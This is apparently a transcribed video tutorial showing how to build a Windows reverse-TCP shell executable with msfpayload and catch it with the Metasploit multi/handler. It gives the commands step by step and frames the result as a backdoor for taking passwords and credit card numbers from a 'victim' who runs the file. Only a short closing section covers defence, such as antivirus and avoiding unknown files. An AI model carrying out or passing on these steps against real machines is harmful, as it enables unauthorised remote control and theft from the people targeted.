Hey guys, welcome back to our Catalan tutorials. Today we're going to be learning about MSF payloads and how to use MSF console and Metaspolit. So to get started, we're going to open up a terminal real quick, and before I type in any commands, I just want to tell you guys what a payload is. So a payload is a computer program or virus that has a Trojan inside of it, and Trojan is basically it creates a backdoor on the victim's PC. So what we're going to make is a payload that we send to our victim, and they run it, and it doesn't do anything, it doesn't open anything, so they think nothing about it. But on our end, it will open up a backdoor that we can see into their PC. We can download files, upload files, we can get passwords, usernames, credit card numbers, anything, which is obviously bad. But that's what we're going to be doing today. So, like I said, we're going to be open up a new terminal, and I'm just going to paste this since this is kind of a long code. I'll leave this in the description, but if you want to type it out, it's MSF payload Windows /shell _reverse _ TCP lhost. And what you want to do for that is, as I told you in other tutorials, how to get your internal IP address, you just want to switch it to that. And in case you're wondering how to do that, you just want to type in ifconfig in a new terminal, and it is this number right here. So that's what I replaced. And then lhost equals, and then that, and then space lport equals, and you just want to put in the port number that you port forwarded on your computer. So mine is 8080, and then space x space little caret space temp1.exe. And what this does is this basically just tells it where to put this file that we're going to make, and this is the Windows shell, and reverse TCP is making a backdoor on the victim's computer, and the lhost is obviously our internal IP address and the port, and stuff like that. So we're just going to click enter for that, and it's just going to say it's going to be making everything and stuff like that. Let's just wait for that to load, and you can see created payload. It just tells us the payload that we made, length, lhost, and lport. So now that we made it in there, we can go to our computer. If it will open, there we go. Go to our file system, we can go to our temp, and as you can see, 1.exe. That's our virus that we made. So now what we want to do is we want to put this in and send it to our victim. So I'm just going to be moving over to our Windows victim PC, and this is what we're going to be using. So I just want to come back over here, and I'm just going to drag this. Well, actually, let's just make that not so big, and I'll just drag this over here, 1.exe, and I'll go back over here and drag it right into here. So now it's on our victim's PC. So then the second thing you want to do is you want to just minimize this, and you want to open up a new terminal, and you're going to type in MSF console. I'm not going to enter it because it takes kind of a long time to start up, but you're going to enter that, and then it's going to open this window. Apologize. And what this is it controls the payload, and it basically listens for the payload to come back, and this is how we'll control our victim's PC. So I'm just gonna go to this. So what you want to type in is use exploit /multi/handler. So wait for that to load, and then you're gonna set the lhost the same as what you set your virus as. So set lhost our internal IP address, and set lport the same as your virus, and just make sure that this is all correct, and then you're going to press exploit. And what it's basically doing is listening for the payload to talk back to it. So now we're just going to go on our victim PC and just pretend we're a victim. Oh, look at this cool file. Let's just open it right up, and as you can see, nothing happens. But if we go back over here, if it will load, it says sending stage to 10.0.0.4. Wait for it to load. It's basically sending the stages, everything like that. Let's go back over here, make sure this is all up and running. Usually doesn't take this long. Alright, and we're back. Alright, so let's just restart this. So, I made a mistake of not setting the payload. So, let's just do the multi-handler again. And now, instead of just going right into set lhost and lport, let's set the payload. And the one that we use is Windows Shell Reverse TCP. So use that. Now we can set the lhost and the lport. Okay, so just make sure to do that. Now we can press exploit. And as you can see, it's now starting the payload handler and everything like that. So now we can go back over here, double click that again. And as you can see, it's doing a lot more work this time. And as you can see, now it comes up with sending stage, and and as you can see, now we're on the desktop. So you can do a lot of stuff like help. We can use shutdown. Copy, print, just go through a lot of this stuff. You can copy, delete files, date, call, some crazy stuff that you should not be able to do, but obviously we can because we made a backdoor into the victim's computer. So we can just go through a little bit of these commands. I recommend you look through these because there's kind of some fun ones that you can do. But now let's get into how to defend yourself against this. So obviously, just having a good antivirus. I don't have this on this computer because it's a test computer for a victim. But just having a good antivirus that will catch this stuff. Also, just not running things that look a little shady. As you can see, this just doesn't have an icon. And if you right-click it and go to Properties, it has no description, it's just kind of weird. Details. This kind of looks not very suspicious, but and just not really downloading files that you don't from people you don't really trust. So what you can do if you're ever infected with this kind of virus, you should delete this file. I would restart your computer and then run a program like Malwarebytes or an antivirus to try and fix the issue. If all else fails, you can always restore your hard drive, and that will obviously get rid of the backdoor on your computer. But that's pretty much it for this tutorial. It's kind of a fun one that I like to do, and it has a lot of options, and it's kind of like an overkill kind of attack. But nonetheless, thank you for watching, and I'll see you next time.